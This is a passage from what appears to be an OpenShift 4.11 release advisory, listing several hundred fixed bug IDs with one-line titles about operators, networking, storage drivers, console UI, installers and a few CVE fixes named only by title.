2072766 - Cluster Network Operator stuck in CrashLoopBackOff when scheduled to same master
2072780 - OVN kube-master does not clear NetworkUnavailableCondition on GCP BYOH Windows node
2072793 - Drop "Used Filesystem" from "Virtualization -> Overview"
2072805 - Observe > Dashboards: $__range variables cause PromQL query errors
2072807 - Observe > Dashboards: Missing panel.styles attribute for table panels causes JS error
2072842 - (release-4.11) Gather namespace names with overlapping UID ranges
2072883 - sometimes monitoring dashboards charts can not be loaded successfully
2072891 - Update gcp-pd-csi-driver to 1.5.1
2072911 - panic observed in kubedescheduler operator
2072924 - periodic-ci-openshift-release-master-ci-4.11-e2e-azure-techpreview-serial
2072957 - ContainerCreateError loop leads to several thousand empty logfiles in the file system
2072998 - update aws-efs-csi-driver to the latest version
2072999 - Navigate from logs of selected Tekton task instead of last one
2073021 - [vsphere] Failed to update OS on master nodes
2073112 - Prometheus (uwm) externalLabels not always showing in alerts
2073113 - Warning is logged to the console: W0407 Defaulting of registry auth file to "${HOME}/.docker/config.json" is deprecated.
2073176 - removing data in form does not remove data from yaml editor
2073197 - Error in Spoke/SNO agent: Source image rejected: A signature was required, but no signature exists
2073329 - Pipelines-plugin - Having different title for Pipeline Runs tab: on Pipeline Details page it's "PipelineRuns" and on Repository Details page it's "Pipeline Runs".
2073373 - Update azure-disk-csi-driver to 1.16.0
2073378 - failed egressIP assignment - cloud-network-config-controller does not delete failed cloudprivateipconfig
2073398 - machine-api-provider-openstack does not clean up OSP ports after failed server provisioning
2073436 - Update azure-file-csi-driver to v1.14.0
2073437 - Topology performance: Firehose/useK8sWatchResources cache can return unexpected data format if isList differs on multiple calls
2073452 - [sig-network] pods should successfully create sandboxes by other - failed (add)
2073473 - [OVN SCALE][ovn-northd] Unnecessary SB record no-op changes added to SB transaction.
2073522 - Update ibm-vpc-block-csi-driver to v4.2.0
2073525 - Update vpc-node-label-updater to v4.1.2
2073901 - Installation failed due to etcd operator Err:DefragControllerDegraded: failed to dial endpoint https://10.0.0.7:2379 with maintenance client: context canceled
2073937 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for UWM
2073938 - APIRemovedInNextEUSReleaseInUse alert for runtimeclasses
2073945 - APIRemovedInNextEUSReleaseInUse alert for podsecuritypolicies
2073972 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for platform monitoring
2074009 - [OVN] ovn-northd doesn't clean Chassis_Private record after scaling a machineSet down to 0
2074031 - Admins should be able to tune garbage collector aggressiveness (GOGC) for kube-apiserver if necessary
2074062 - Node Tuning Operator (NTO) - Cloud provider profile rollback doesn't work well
2074084 - CMO metrics not visible in the OCP webconsole UI
2074100 - CRD filtering according to name broken
2074210 - asia-south2, australia-southeast2, and southamerica-west1 missing from GCP regions
2074237 - oc new-app --image-stream flag behavior is unclear
2074243 - DefaultPlacement API allows empty enum value and remove default
2074447 - cluster-dashboard: CPU Utilisation iowait and steal
2074465 - PipelineRun fails in import from Git flow if "main" branch is default
2074471 - Cannot delete namespace with a LB type svc and Kuryr when ExternalCloudProvider is enabled
2074475 - [e2e][automation] kubevirt plugin cypress tests fail
2074483 - coreos-installer doesn't work on Dell machines
2074544 - e2e-metal-ipi-ovn-ipv6 failing due to recent CEO changes
2074585 - MCG standalone deployment page goes blank when the KMS option is enabled
2074606 - occm does not have permissions to annotate SVC objects
2074612 - Operator fails to install due to service name lookup failure
2074613 - nodeip-configuration container incorrectly attempts to relabel /etc/systemd/system
2074635 - Unable to start Web Terminal after deleting existing instance
2074659 - AWS installconfig ValidateForProvisioning always provides blank values to validate zone records
2074706 - Custom EC2 endpoint is not considered by AWS EBS CSI driver
2074710 - Transition to go-ovirt-client
2074756 - Namespace column provides wrong data in ClusterRole Details -> Rolebindings tab
2074767 - Metrics page shows incorrect values due to metrics level config
2074807 - NodeFilesystemSpaceFillingUp alert fires even before kubelet GC kicks in
2074902 - oc debug node/nodename -- chroot /host somecommand should exit with non-zero when the sub-command failed
2075015 - etcd-guard connection refused event repeating pathologically (payload blocking)
2075024 - Metal upgrades permafailing on metal3 containers crash looping
2075050 - oc-mirror fails to calculate between two channels with different prefixes for the same version of OCP
2075091 - Symptom Detection.Undiagnosed panic detected in pod
2075117 - Developer catalog: Order dropdown (A-Z, Z-A) is misaligned (in a separate row)
2075149 - Trigger Translations When Extensions Are Updated
2075189 - Imports from dynamic-plugin-sdk lead to failed module resolution errors
2075459 - Set up cluster on aws with root volume io2 failed due to no iops despite it being configured
2075475 - OVN-Kubernetes: egress router pod (redirect mode), access from pod on different worker-node (redirect) doesn't work
2075478 - Bump documentationBaseURL to 4.11
2075491 - nmstate operator cannot be upgraded on SNO
2075575 - Local Dev Env - Prometheus 404 Call errors spam the console
2075584 - improve clarity of build failure messages when using csi shared resources but tech preview is not enabled
2075592 - Regression - Top of the web terminal drawer is missing a stroke/dropshadow
2075621 - Cluster upgrade.[sig-mco] Machine config pools complete upgrade
2075647 - 'oc adm upgrade ...' POSTs ClusterVersion, clobbering any unrecognized spec properties
2075671 - Cluster Ingress Operator K8S API cache contains duplicate objects
2075778 - Fix failing TestGetRegistrySamples test
2075873 - Bump recommended FCOS to 35.20220327.3.0
2076193 - oc patch command for the liveness probe and readiness probe parameters of an OpenShift router deployment doesn't take effect
2076270 - [OCPonRHV] MachineSet scale down operation fails to delete the worker VMs
2076277 - [RFE] [OCPonRHV] Add storage domain ID value to Compute/ControlPlain section in the machine object
2076290 - PTP operator readme missing documentation on BC setup via PTP config
2076297 - Router process ignores shutdown signal while starting up
2076323 - OLM blocks all operator installs if an openshift-marketplace catalogsource is unavailable
2076355 - The KubeletConfigController wrongly processes multiple confs for a pool after having kubeletconfig in bootstrap
2076393 - [VSphere] survey fails to list datacenters
2076521 - Nodes in the same zone are not updated in the right order
2076527 - Pipeline Builder: Makes unnecessary tekton hub API calls when the user types 'too fast'
2076544 - Whitespace (padding) is missing after a PatternFly update, already in 4.10
2076553 - Project access view replaces group ref with user ref when updating their Role
2076614 - Missing Events component from the SDK API
2076637 - Configure metrics for vsphere driver to be reported
2076646 - openshift-install destroy unable to delete PVC disks in GCP if cluster identifier is longer than 22 characters
2076793 - CVO exits upgrade immediately rather than waiting for etcd backup
2076831 - [ocp4.11] Mem/cpu high utilization by apiserver/etcd for cluster stayed 10 hours
2076877 - network operator tracker to switch to use flowcontrol.apiserver.k8s.io/v1beta2 instead of v1beta1, to be deprecated in k8s 1.26
2076880 - OKD: add cluster domain to the uploaded vm configs so that 30-local-dns-prepender can use it
2076975 - Metric unset during static route conversion in configure-ovs.sh
2076984 - TestConfigurableRouteNoConsumingUserNoRBAC fails in CI
2077050 - OCP should default to pd-ssd disk type on GCP
2077150 - Breadcrumbs on a few screens don't have correct top margin spacing
2077160 - Update owners for openshift/cluster-etcd-operator
2077357 - [release-4.11] 200ms packet delay with OVN controller turned on
2077373 - Accessibility warning on developer perspective
2077386 - Import page shows untranslated values for the route advanced routing>security options (devconsole~Edge)
2077457 - failure in test case "[sig-network][Feature:Router] The HAProxy router should serve the correct routes when running with the haproxy config manager"
2077497 - Rebase etcd to 3.5.3 or later
2077597 - machine-api-controller is not taking the proxy configuration when it needs to reach the RHV API
2077599 - OCP should alert users if they are on vsphere version <7.0.2
2077662 - AWS Platform Provisioning Check incorrectly identifies record as part of domain of cluster
2077797 - LSO pods don't have any resource requests
2077851 - "make vendor" target is not working
2077943 - If there is a service with multiple ports, and the route uses 8080, when editing the 8080 port isn't replaced, but a random port gets replaced and 8080 still stays
2077994 - Publish RHEL CoreOS AMIs in AWS ap-southeast-3 region
2078013 - drop multipathd.socket workaround
2078375 - When using the wizard with a template using a data source, the resulting vm uses pvc source
2078396 - [OVN AWS] EgressIP was not balanced to another egress node after original node had egress label removed
2078431 - [OCPonRHV] - ERROR failed to instantiate provider "openshift/local/ovirt" to obtain schema: ERROR fork/exec
2078526 - Multicast breaks after master node reboot/sync
2078573 - SDN CNI - Fail to create nncp when vxlan is up
2078634 - CRI-O not killing Calico CNI stalled (zombie) processes.
2078698 - search box may not completely remove content
2078769 - Different untranslated filter group names (incl. Secret, Pipeline, PipelineRun)
2078778 - [4.11] oc get ValidatingWebhookConfiguration,MutatingWebhookConfiguration fails and caused "apiserver panic'd...http2: panic serving xxx.xx.xxx.21:49748: cannot deep copy int" when AllRequestBodies audit-profile is used.
2078781 - PreflightValidation does not handle multiarch images
2078866 - [BM][IPI] Installation with bonds fails - DaemonSet "openshift-ovn-kubernetes/ovnkube-node" rollout is not making progress
2078875 - OpenShift Installer fails to remove Neutron ports
2078895 - [OCPonRHV] - "cow" unsupported value in format field in install-config.yaml
2078910 - CNO spitting out ".spec.groups[0].rules[4].runbook_url: field not declared in schema"
2078945 - Ensure only one apiserver-watcher process is active on a node.
2078954 - network-metrics-daemon makes costly global pod list calls scaling per node
2078969 - Avoid update races between old and new NTO operands during cluster upgrades
2079012 - egressIP not migrated to correct workers after deleting the machineset it was assigned to
2079062 - Test for console demo plugin toast notification needs to be increased for ci testing
2079197 - [RFE] alert when more than one default storage class is detected
2079216 - Partial cluster update reference doc link returns 404
2079292 - containers prometheus-operator/kube-rbac-proxy violate PodSecurity
2079315 - (release-4.11) Gather ODF config data with Insights
2079422 - Deprecated 1.25 API call
2079439 - OVN Pods Assigned Same IP Simultaneously
2079468 - Enhance the waitForIngressControllerCondition for better CI results
2079500 - okd-baremetal-install uses fcos for bootstrap but rhcos for cluster
2079610 - Operatorhub status shows errors
2079663 - change default image features in RBD storageclass
2079673 - Add flags to disable migrated code
2079685 - Storageclass creation page with "Enable encryption" is not displaying saved KMS connection details when vaulttenantsa details are available in csi-kms-details config
2079724 - cluster-etcd-operator - disable defrag-controller as there is unpredictable impact on large OpenShift Container Platform 4 - Cluster
2079788 - Operator restarts while applying the acm-ice example
2079789 - cluster drops ImplicitlyEnabledCapabilities during upgrade
2079803 - Upgrade-triggered etcd backup will be skipped during serial upgrade
2079805 - Secondary scheduler operator should comply with restricted pod security level
2079818 - Developer catalog installation overlay (modal?) shows a duplicated padding
2079837 - [RFE] Hub/Spoke example with daemonset
2079844 - EFS cluster csi driver status stuck in AWSEFSDriverCredentialsRequestControllerProgressing with sts installation
2079845 - The Event Sinks catalog page now has a blank space on the left
2079869 - Builds for multiple kernel versions should be run in parallel when possible
2079913 - [4.10] APIRemovedInNextEUSReleaseInUse alert for OVN endpointslices
2079961 - The search results accordion has no spacing between it and the side navigation bar.
2079965 - [rebase v1.24] [sig-node] PodOSRejection [NodeConformance] Kubelet should reject pod when the node OS doesn't match pod's OS [Suite:openshift/conformance/parallel] [Suite:k8s]
2080054 - TAGS arg for installer-artifacts images is not propagated to build images
2080153 - aws-load-balancer-operator-controller-manager pod stuck in ContainerCreating status
2080197 - etcd leader changes produce test churn during early stage of test
2080255 - EgressIP broken on AWS with OpenShiftSDN / latest nightly build
2080267 - [Fresh Installation] Openshift-machine-config-operator namespace is flooded with events related to clusterrole, clusterrolebinding
2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local users
2080379 - Group all e2e tests as parallel or serial
2080387 - Visual connector does not appear between the nodes if a node gets created using "move connector" to a different application
2080416 - oc bash-completion problem
2080429 - CVO must ensure non-upgrade related changes are saved when desired payload fails to load
2080446 - Sync ironic images with latest bug fixes packages
2080679 - [rebase v1.24] [sig-cli] test failure
2080681 - [rebase v1.24] [sig-cluster-lifecycle] CSRs from machines that are not recognized by the cloud provider are not approved [Suite:openshift/conformance/parallel]
2080687 - [rebase v1.24] [sig-network][Feature:Router] tests are failing
2080873 - Topology graph crashes after update to 4.11 when Layout 2 (ColaForce) was selected previously
2080964 - Cluster operator special-resource-operator is always in Failing state with reason: "Reconciling simple-kmod"
2080976 - Avoid hooks config maps when hooks are empty
2081012 - [rebase v1.24] [sig-devex][Feature:OpenShiftControllerManager] TestAutomaticCreationOfPullSecrets [Suite:openshift/conformance/parallel]
2081018 - [rebase v1.24] [sig-imageregistry][Feature:Image] oc tag should work when only imagestreams api is available
2081021 - [rebase v1.24] [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources
2081062 - Unrevert RHCOS back to 8.6
2081067 - admin dev-console /settings/cluster should point out history may be excerpted
2081069 - [sig-network] pods should successfully create sandboxes by adding pod to network
2081081 - PreflightValidation "odd number of arguments passed as key-value pairs for logging" error
2081084 - [rebase v1.24] [sig-instrumentation] Events API should ensure that an event can be fetched, patched, deleted, and listed
2081087 - [rebase v1.24] [sig-auth] ServiceAccounts should allow opting out of API token automount
2081119 - oc explain output of default overlaySize is outdated
2081172 - MetalLB: YAML view in webconsole does not show all the available key value pairs of all the objects
2081201 - cloud-init User check for Windows VM refuses to accept capitalized usernames
2081447 - Ingress operator performs spurious updates in response to API's defaulting of router deployment's router container's ports' protocol field
2081562 - lifecycle.postStart hook does not have network connectivity.
2081685 - Typo in NNCE Conditions
2081743 - [e2e] tests failing
2081788 - MetalLB: the crds are not validated until metallb is deployed
2081821 - SpecialResourceModule CRD is not installed after deploying SRO operator using brew bundle image via OLM
2081895 - Use the managed resource (and not the manifest) for resource health checks
2081997 - disconnected insights operator remains degraded after editing pull secret
2082075 - Removing huge amount of ports takes a lot of time.
2082235 - CNO exposes a generic apiserver that apparently does nothing
2082283 - Transition to new oVirt Terraform provider
2082360 - OCP 4.10.4, CNI: SDN; Whereabouts IPAM: Duplicate IP address with bond-cni
2082380 - [4.10.z] customize wizard crashes
2082403 - [LSO] No new build local-storage-operator-metadata-container created
2082428 - oc patch healthCheckInterval with invalid "5 s" to the ingress-controller succeeds
2082441 - [UPI] aws-load-balancer-operator-controller-manager failed to get VPC ID in UPI on AWS
2082492 - [IPI IBM] Can't create image-registry-private-configuration secret with error "specified resource key credentials does not contain HMAC keys"
2082535 - [OCPonRHV] - workers are cloned when "clone: false" is specified in install-config.yaml
2082538 - apirequests limits of Cluster CAPI Operator are too low for GCP platform
2082566 - OCP dashboard fails to load when the query to Prometheus takes more than 30s to return
2082604 - [IBMCloud][x86_64] IBM VPC does not properly support RHCOS Custom Image tagging
2082667 - No new machines provisioned while machineset controller drained old nodes for change to machineset
2082687 - [IBM Cloud][x86_64][CCCMO] IBM x86_64 CCM using unsupported --port argument
2082763 - Cluster install stuck on the applying for operatorhub "cluster"
2083149 - "Update blocked" label incorrectly displays on new minor versions in the "Other available paths" modal
2083153 - Unable to use application credentials for Manila PVC creation on OpenStack
2083154 - Dynamic plugin sdk tsdoc generation does not render docs for parameters
2083219 - DPU network operator doesn't deal with c1... interface names
2083237 - [vsphere-ipi] Machineset scale up process delay
2083299 - SRO does not fetch mirrored DTK images in disconnected clusters
2083445 - [FJ OCP4.11 Bug]: RAID setting during IPI cluster deployment fails if iRMC port number is specified
2083451 - Update external services URLs to console.redhat.com
2083459 - Make numvfs > totalvfs error message more verbose
2083466 - Failed to create clusters on AWS C2S/SC2S due to image-registry MissingEndpoint error
2083514 - Operator ignores managementState Removed
2083641 - OpenShift Console Knative Eventing ContainerSource generates wrong api version when pointed to k8s Service
2083756 - Linkify not upgradeable message on ClusterSettings page
2083770 - Release image signature manifest filename extension is yaml
2083919 - openshift4/ose-operator-registry:4.10.0 has security vulnerabilities
2083942 - Learner promotion can temporarily fail with rpc not supported for learner errors
2083964 - Sink resources dropdown is not persisted in form yaml switcher in event source creation form
2083999 - "--prune-over-size-limit" is not working as expected
2084079 - prometheus route is not updated to "path: /api" after upgrade from 4.10 to 4.11
2084081 - nmstate-operator installed cluster on POWER shows issues while adding new dhcp interface
2084124 - The Update cluster modal includes a broken link
2084215 - Resource configmap "openshift-machine-api/kube-rbac-proxy" is defined by 2 manifests
2084249 - panic in ovn pod from an e2e-aws-single-node-serial nightly run
2084280 - GCP API Checks Fail if non-required APIs are not enabled
2084288 - "alert/Watchdog must have no gaps or changes" failing after bump
2084292 - Access to dashboard resources is needed in dynamic plugin SDK
2084331 - Resource with multiple capabilities included unless all capabilities are disabled
2084433 - Podsecurity violation error getting logged for ingresscontroller during deployment.
2084438 - Change Ping source spec.jsonData (deprecated) field to spec.data 2084441 - [IPI-Azure]fail to check the vm capabilities in install cluster 2084459 - Topology list view crashes when switching from chart view after moving sink from knative service to uri 2084463 - 5 control plane replica tests fail on ephemeral volumes 2084539 - update azure arm templates to support customer provided vnet 2084545 - [rebase v1.24] cluster-api-operator causes all techpreview tests to fail 2084580 - [4.10] No cluster name sanity validation - cluster name with a dot (".") character 2084615 - Add to navigation option on search page is not properly aligned 2084635 - PipelineRun creation from the GUI for a Pipeline with 2 workspaces hardcode the PVC storageclass 2084732 - A special resource that was created in OCP 4.9 can't be deleted after an upgrade to 4.10 2085187 - installer-artifacts fails to build with go 1.18 2085326 - kube-state-metrics is tripping APIRemovedInNextEUSReleaseInUse 2085336 - [IPI-Azure] Fail to create the worker node which HyperVGenerations is V2 or V1 and vmNetworkingType is Accelerated 2085380 - [IPI-Azure] Incorrect error prompt validate VM image and instance HyperV gen match when install cluster 2085407 - There is no Edit link/icon for labels on Node details page 2085721 - customization controller image name is wrong 2086056 - Missing doc for OVS HW offload 2086086 - Update Cluster Sample Operator dependencies and libraries for OCP 4.11 2086092 - update kube to v.24 2086143 - CNO uses too much memory 2086198 - Cluster CAPI Operator creates unnecessary defaulting webhooks 2086301 - kubernetes nmstate pods are not running after creating instance 2086408 - Podsecurity violation error getting logged for externalDNS operand pods during deployment 2086417 - Pipeline created from add flow has GIT Revision as required field 2086437 - EgressQoS CRD not available 2086450 - aws-load-balancer-controller-cluster pod logged Podsecurity violation error during 
deployment 2086459 - oc adm inspect fails when one of resources not exist 2086461 - CNO probes MTU unnecessarily in Hypershift, making cluster startup take too long 2086465 - External identity providers should log login attempts in the audit trail 2086469 - No data about title 'API Request Duration by Verb - 99th Percentile' display on the dashboard 'API Performance' 2086483 - baremetal-runtimecfg k8s dependencies should be on a par with 1.24 rebase 2086505 - Update oauth-server images to be consistent with ART 2086519 - workloads must comply to restricted security policy 2086521 - Icons of Knative actions are not clearly visible on the context menu in the dark mode 2086542 - Cannot create service binding through drag and drop 2086544 - ovn-k master daemonset on hypershift shouldn't log token 2086546 - Service binding connector is not visible in the dark mode 2086718 - PowerVS destroy code does not work 2086728 - [hypershift] Move drain to controller 2086731 - Vertical pod autoscaler operator needs a 4.11 bump 2086734 - Update csi driver images to be consistent with ART 2086737 - cloud-provider-openstack rebase to kubernetes v1.24 2086754 - Cluster resource override operator needs a 4.11 bump 2086759 - [IPI] OCP-4.11 baremetal - boot partition is not mounted on temporary directory 2086791 - Azure: Validate UltraSSD instances in multi-zone regions 2086851 - pods with multiple external gateways may only be have ECMP routes for one gateway 2086936 - vsphere ipi should use cores by default instead of sockets 2086958 - flaky e2e in kube-controller-manager-operator TestPodDisruptionBudgetAtLimitAlert 2086959 - flaky e2e in kube-controller-manager-operator TestLogLevel 2086962 - oc-mirror publishes metadata with --dry-run when publishing to mirror 2086964 - oc-mirror fails on differential run when mirroring a package with multiple channels specified 2086972 - oc-mirror does not error invalid metadata is passed to the describe command 2086974 - oc-mirror does not work with 
headsonly for operator 4.8 2087024 - The oc-mirror result mapping.txt is not correct , can?t be used byoc image mirrorcommand 2087026 - DTK's imagestream is missing from OCP 4.11 payload 2087037 - Cluster Autoscaler should use K8s 1.24 dependencies 2087039 - Machine API components should use K8s 1.24 dependencies 2087042 - Cloud providers components should use K8s 1.24 dependencies 2087084 - remove unintentional nic support 2087103 - "Updating to release image" from 'oc' should point out that the cluster-version operator hasn't accepted the update 2087114 - Add simple-procfs-kmod in modprobe example in README.md 2087213 - Spoke BMH stuck "inspecting" when deployed via ZTP in 4.11 OCP hub 2087271 - oc-mirror does not check for existing workspace when performing mirror2mirror synchronization 2087556 - Failed to render DPU ovnk manifests 2087579 ---keep-manifest-list=truedoes not work foroc adm release new, only pick up the linux/amd64 manifest from the manifest list 2087680 - [Descheduler] Sync with sigs.k8s.io/descheduler 2087684 - KCMO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile 2087685 - KASO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile 2087687 - MCO does not generate event when user applies Default -> LowUpdateSlowReaction WorkerLatencyProfile 2087764 - Rewrite the registry backend will hit error 2087771 - [tracker] NetworkManager 1.36.0 loses DHCP lease and doesn't try again 2087772 - Bindable badge causes some layout issues with the side panel of bindable operator backed services 2087942 - CNO references images that are divergent from ART 2087944 - KafkaSink Node visualized incorrectly 2087983 - remove etcd_perf before restore 2087993 - PreflightValidation many "msg":"TODO: preflight checks" in the operator log 2088130 - oc-mirror init does not allow for automated testing 2088161 - Match dockerfile image name with the name used in the release repo 2088248 - Create HANA VM does not 
use values from customized HANA templates 2088304 - ose-console: enable source containers for open source requirements 2088428 - clusteroperator/baremetal stays in progressing: Applying metal3 resources state on a fresh install 2088431 - AvoidBuggyIPs field of addresspool should be removed 2088483 - oc adm catalog mirror returns 0 even if there are errors 2088489 - Topology list does not allow selecting an application group anymore (again) 2088533 - CRDs for openshift.io should have subresource.status failes on sharedconfigmaps.sharedresource and sharedsecrets.sharedresource 2088535 - MetalLB: Enable debug log level for downstream CI 2088541 - Default CatalogSources in openshift-marketplace namespace keeps throwing pod security admission warningswould violate PodSecurity "restricted:v1.24"2088561 - BMH unable to start inspection: File name too long 2088634 - oc-mirror does not fail when catalog is invalid 2088660 - Nutanix IPI installation inside container failed 2088663 - Better to change the default value of --max-per-registry to 6 2089163 - NMState CRD out of sync with code 2089191 - should remove grafana from cluster-monitoring-config configmap in hypershift cluster 2089224 - openshift-monitoring/cluster-monitoring-config configmap always revert to default setting 2089254 - CAPI operator: Rotate token secret if its older than 30 minutes 2089276 - origin tests for egressIP and azure fail 2089295 - [Nutanix]machine stuck in Deleting phase when delete a machineset whose replicas>=2 and machine is Provisioning phase on Nutanix 2089309 - [OCP 4.11] Ironic inspector image fails to clean disks that are part of a multipath setup if they are passive paths 2089334 - All cloud providers should use service account credentials 2089344 - Failed to deploy simple-kmod 2089350 - Rebase sdn to 1.24 2089387 - LSO not taking mpath. 
ignoring device 2089392 - 120 node baremetal upgrade from 4.9.29 --> 4.10.13 crashloops on machine-approver 2089396 - oc-mirror does not show pruned image plan 2089405 - New topology package shows gray build icons instead of green/red icons for builds and pipelines 2089419 - do not block 4.10 to 4.11 upgrades if an existing CSI driver is found. Instead, warn about presence of third party CSI driver 2089488 - Special resources are missing the managementState field 2089563 - Update Power VS MAPI to use api's from openshift/api repo 2089574 - UWM prometheus-operator pod can't start up due to no master node in hypershift cluster 2089675 - Could not move Serverless Service without Revision (or while starting?) 2089681 - [Hypershift] EgressIP doesn't work in hypershift guest cluster 2089682 - Installer expects all nutanix subnets to have a cluster reference which is not the case for e.g. overlay networks 2089687 - alert message of MCDDrainError needs to be updated for new drain controller 2089696 - CR reconciliation is stuck in daemonset lifecycle 2089716 - [4.11][reliability] one worker node became NotReady on which ovnkube-node pod's memory increased sharply 2089719 - acm-simple-kmod fails to build 2089720 - [Hypershift] ICSP doesn't work for the guest cluster 2089743 - acm-ice fails to deploy: helm chart does not appear to be a gzipped archive 2089773 - Pipeline status filter and status colors don't work correctly with non-English languages 2089775 - keepalived can keep ingress VIP on wrong node under certain circumstances 2089805 - Config duration metrics aren't exposed 2089827 - MetalLB CI - backward compatible tests are failing due to the order of delete 2089909 - PTP e2e testing not working on SNO cluster 2089918 - oc-mirror skip-missing still returns 404 errors when images do not exist 2089930 - Bump OVN to 22.06 2089933 - Pods do not post readiness status on termination 2089968 - Multus CNI daemonset should use hostPath mounts with type: directory 2089973 - 
bump libs to k8s 1.24 for OCP 4.11 2089996 - Unnecessary yarn install runs in e2e tests 2090017 - Enable source containers to meet open source requirements 2090049 - destroying GCP cluster which has a compute node without infra id in name would fail to delete 2 k8s firewall-rules and VPC network 2090092 - Will hit error if the specified channel is not the latest 2090151 - [RHEL scale up] increase the wait time so that the node has enough time to get ready 2090178 - VM SSH command generated by UI points at api VIP 2090182 - [Nutanix] Create a machineset with invalid image, machine stuck in "Provisioning" phase 2090236 - Only reconcile annotations and status for clusters 2090266 - oc adm release extract is failing on multi-arch image 2090268 - [AWS EFS] Operator not getting installed successfully on Hypershift Guest cluster 2090336 - Multus logging should be disabled prior to release 2090343 - Multus debug logging should be enabled temporarily for debugging podsandbox creation failures. 2090358 - Initiating drain log message is displayed before the drain actually starts 2090359 - Nutanix mapi-controller: misleading error message when the failure is caused by wrong credentials 2090405 - [tracker] weird port mapping with asymmetric traffic [rhel-8.6.0.z] 2090430 - gofmt code 2090436 - It takes 30min-60min to update the machine count in custom MachineConfigPools (MCPs) when a node is removed from the pool 2090437 - Bump CNO to k8s 1.24 2090465 - golang version mismatch 2090487 - Change default SNO Networking Type and disallow OpenShiftSDN as a supported networking Type 2090537 - failure in ovndb migration when db is not ready in HA mode 2090549 - dpu-network-operator shall be able to run on amd64 arch platform 2090621 - Metal3 plugin does not work properly with updated NodeMaintenance CRD 2090627 - Git commit and branch are empty in MetalLB log 2090692 - Bump to latest 1.24 k8s release 2090730 - must-gather should include multus logs. 
2090731 - nmstate deploys two instances of webhook on a single-node cluster 2090751 - oc image mirror skip-missing flag does not skip images 2090755 - MetalLB: BGPAdvertisement validation allows duplicate entries for ip pool selector, ip address pools, node selector and bgp peers 2090774 - Add Readme to plugin directory 2090794 - MachineConfigPool cannot apply a configuration after fixing the pods that caused a drain alert 2090809 - gm.ClockClass invalid syntax parse error in linux ptp daemon logs 2090816 - OCP 4.8 Baremetal IPI installation failure: "Bootstrap failed to complete: timed out waiting for the condition" 2090819 - oc-mirror does not catch invalid registry input when a namespace is specified 2090827 - Rebase CoreDNS to 1.9.2 and k8s 1.24 2090829 - Bump OpenShift router to k8s 1.24 2090838 - Flaky test: ignore flapping host interface 'tunbr' 2090843 - addLogicalPort() performance/scale optimizations 2090895 - Dynamic plugin nav extension "startsWith" property does not work 2090929 - [etcd] cluster-backup.sh script has a conflict to use the '/etc/kubernetes/static-pod-certs' folder if a custom API certificate is defined 2090993 - [AI Day2] Worker node overview page crashes in Openshift console with TypeError 2091029 - Cancel rollout action only appears when rollout is completed 2091030 - Some BM may fail booting with default bootMode strategy 2091033 - [Descheduler]: provide ability to override included/excluded namespaces 2091087 - ODC Helm backend Owners file needs updates 2091106 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3 2091142 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3 2091167 - IPsec runtime enabling not work in hypershift 2091218 - Update Dev Console Helm backend to use helm 3.9.0 2091433 - Update AWS instance types 2091542 - Error Loading/404 not found page shown after clicking "Current namespace only" 2091547 - Internet connection test with proxy permanently fails 2091567 - oVirt CSI driver should use latest 
go-ovirt-client 2091595 - Alertmanager configuration can't use OpsGenie's entity field when AlertmanagerConfig is enabled 2091599 - PTP Dual Nic | Extend Events 4.11 - Up/Down master interface affects all the other interfaces in the same NIC according to the events and metrics 2091603 - WebSocket connection restarts when switching tabs in WebTerminal 2091613 - simple-kmod fails to build due to missing KVC 2091634 - OVS 2.15 stops handling traffic once ovs-dpctl(2.17.2) is used against it 2091730 - MCO e2e tests are failing with "No token found in openshift-monitoring secrets" 2091746 - "Oh no! Something went wrong" shown after user creates MCP without 'spec' 2091770 - CVO gets stuck downloading an upgrade, with the version pod complaining about invalid options 2091854 - clusteroperator status filter doesn't match all values in Status column 2091901 - Log stream paused right after updating log lines in Web Console in OCP4.10 2091902 - unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server has received too many requests and has asked us to try again later 2091990 - wrong external-ids for ovn-controller lflow-cache-limit-kb 2092003 - PR 3162 | BZ 2084450 - invalid URL schema for AWS causes tests to perma fail and break the cloud-network-config-controller 2092041 - Bump cluster-dns-operator to k8s 1.24 2092042 - Bump cluster-ingress-operator to k8s 1.24 2092047 - Kube 1.24 rebase for cloud-network-config-controller 2092137 - Search doesn't show all entries when name filter is cleared 2092296 - Change Default MachineCIDR of Power VS Platform from 10.x to 192.168.0.0/16 2092390 - [RDR] [UI] Multiple instances of Object Bucket, Object Bucket Claims and 'Overview' tab is present under Storage section on the Hub cluster when navigated back from the Managed cluster using the Hybrid console dropdown 2092395 - etcdHighNumberOfFailedGRPCRequests alerts with wrong results 2092408 - Wrong icon is used in the virtualization overview permissions card 
2092414 - In virtualization overview "running vm per templates" template list can be improved 2092442 - Minimum time between drain retries is not the expected one 2092464 - marketplace catalog defaults to v4.10 2092473 - libovsdb performance backports 2092495 - ovn: use up to 4 northd threads in non-SNO clusters 2092502 - [azure-file-csi-driver] Stop shipping a NFS StorageClass 2092509 - Invalid memory address error if non existing caBundle is configured in DNS-over-TLS using ForwardPlugins 2092572 - acm-simple-kmod chart should create the namespace on the spoke cluster 2092579 - Don't retry pod deletion if objects are not existing 2092650 - [BM IPI with Provisioning Network] Worker nodes are not provisioned: ironic-agent is stuck before writing into disks 2092703 - Incorrect mount propagation information in container status 2092815 - can't delete the unwanted image from registry by oc-mirror 2092851 - [Descheduler]: allow to customize the LowNodeUtilization strategy thresholds 2092867 - make repository name unique in acm-ice/acm-simple-kmod examples 2092880 - etcdHighNumberOfLeaderChanges returns incorrect number of leadership changes 2092887 - oc-mirror list releases command uses filter-options flag instead of filter-by-os 2092889 - Incorrect updating of EgressACLs using direction "from-lport" 2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability 2092937 - WebScale: OVN-k8s forwarding to external-gw over the secondary interfaces failing 2092966 - [OCP 4.11] [azure] /etc/udev/rules.d/66-azure-storage.rules missing from initramfs 2093044 - Azure machine-api-provider-azure Availability Set Name Length Limit 2093047 - Dynamic Plugins: Generated API markdown duplicates 'checkAccess' and 'useAccessReview' doc 2093126 